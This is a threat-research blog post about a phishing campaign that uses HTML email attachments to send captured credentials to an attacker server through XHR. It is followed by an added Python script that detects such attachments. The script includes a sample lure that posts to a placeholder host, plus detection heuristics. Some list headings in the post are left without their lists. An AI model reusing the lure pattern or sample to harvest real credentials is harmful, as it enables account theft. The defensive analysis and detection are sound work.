It all started when a colleague at Menlo Labs stumbled upon an open directory with usernames and passwords. Looking at the contents of the web server, we identified that this was the result of a single campaign. This campaign was fairly successful and was able to compromise credentials of 164 users at various companies. The threat activity outlined in this post is deemed a Highly Evasive Adaptive Threat (HEAT), which can easily bypass current, traditional security measures.
In the process of analyzing this kit, we came across a unique string: “DH4 VIP3R L337”. This started our quest to understand more about this specific kit and actor.
The questions we sought to answer were:
The modus operandi of the bad actors is to send an HTML attachment via email to their potential victims. While most secure email gateways (SEGs) have default blocks for certain file types, HTML attachments are exempt from this level of defense. This is because many large financial firms send encrypted emails that require users to first register and create an account to securely view the message. These encrypted emails are usually in the form of HTML attachments.
The following screenshot (Figure 1) is an example of what gets displayed to the user when they open the malicious HTML attachment.
Our research reveals that attackers seem to be carefully selecting and customizing their lures based on services used by the target company. In total we identified 147 unique lures used by the attackers. The lures ranged from cybersecurity companies to financial services and everything in between.
The submitted user credentials are sent to the attacker’s CnC using an AJAX XHR request. Thanks to JCyberSec, who sent us the server-side code, we were able to reconstruct the entire attack chain and detail the capabilities of the campaign. The attacker has a unique way of validating the credentials submitted by the victim.
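As an added example (not Menlo Labs' code and not taken from the kit), this is one way a defender could triage HTML email attachments for the shape described above: a password field combined with inline script that issues an XHR to an absolute URL, or the kit string quoted in this post. The regex heuristics, function names, reason labels and the sample message are assumptions constructed for illustration.

```python
import re
from email import message_from_string, policy
from email.message import EmailMessage
from html.parser import HTMLParser

KIT_MARKER = "DH4 VIP3R L337"  # string quoted in the post
XHR_RE = re.compile(r"XMLHttpRequest|\$\.(?:ajax|post)|fetch\s*\(")  # assumed heuristic
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)

class FormScan(HTMLParser):  # counts password inputs, collects inline <script> text
    def __init__(self):
        super().__init__()
        self.password_inputs, self.script, self._in_script = 0, [], False
    def handle_starttag(self, tag, attrs):
        self._in_script = tag == "script"
        if tag == "input" and (dict(attrs).get("type") or "").lower() == "password":
            self.password_inputs += 1
    def handle_endtag(self, tag):
        self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.script.append(data)

def triage_html(html):
    """Return the reasons one HTML document looks like a credential-harvesting lure."""
    scan = FormScan()
    scan.feed(html)
    js = "\n".join(scan.script)
    reasons = ["kit-marker"] if KIT_MARKER in html else []
    if scan.password_inputs and XHR_RE.search(js) and URL_RE.search(js):
        reasons.append("password-field+xhr-to-remote-url")
    return reasons

def triage_message(raw):
    """Map each HTML attachment's filename to its findings; clean attachments are omitted."""
    findings = {}
    for part in message_from_string(raw, policy=policy.default).iter_attachments():
        name = part.get_filename() or "(unnamed)"
        if part.get_content_type() == "text/html" or name.lower().endswith((".htm", ".html")):
            html = part.get_payload(decode=True).decode("utf-8", "replace")
            if reasons := triage_html(html):
                findings[name] = reasons
    return findings

# Constructed sample: inert markup with only the shape the post describes
SAMPLE_HTML = ('<form><input type="email"><input type="password"></form><script>'
               'new XMLHttpRequest().open("POST", "https://collector.example.invalid/r.php");</script>')
SAMPLE = EmailMessage()
SAMPLE.set_content("Open the attachment to view your message.")
SAMPLE.add_attachment(SAMPLE_HTML, subtype="html", filename="message.html")
```

Calling `triage_message(SAMPLE.as_string())` flags `message.html`. Legitimate encrypted-mail attachments can share this shape, so a hit is a reason to review the destination URL, not a verdict.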
The flow of the attack is as follows:
We believe that the initial HTML attachments are created using a kit to automatically generate these HTML payloads. Menlo Labs researchers spent a significant amount of time looking for the kit, but were ultimately unable to locate it. If there are any researchers who are aware of such a kit, we would love to collaborate with them to understand how these payload generation kits function. However, until we have additional details, we are tracking this payload generation kit as VIP3R_L33T Generator.
Most of the domains to which credentials were sent were registered using the NameCheap domain registration service. The service is both cheap and private for the domain registrant, which in essence hides details about who registered the domain.
The following are monikers that were used by the attackers:
Credential phishing continues to be the number one attack that we see across customers. We’ve seen every single customer across geographies and industry verticals affected by this vector. Roughly 22 percent of attacks that we see across our platform are credential phishing attacks, with 7 percent of those attacks not being detected by legacy URL reputation engines. These legacy URL reputation evasion techniques, dubbed LURE by the Menlo Labs research team, are one of the four evasive techniques found in Highly Evasive Adaptive Threats (HEAT). The Menlo Labs team has observed a massive uptick in HEAT attacks, which take advantage of our inherent cognitive biases and fool us into entering our credentials. That bias, combined with the tactics used by attackers, makes these attacks very successful. Increasing cybersecurity awareness through training and education initiatives is often helpful in reducing the impact of credential phishing attacks, but corporate users should always be cautious when a site presents a form that asks for personal or sensitive information.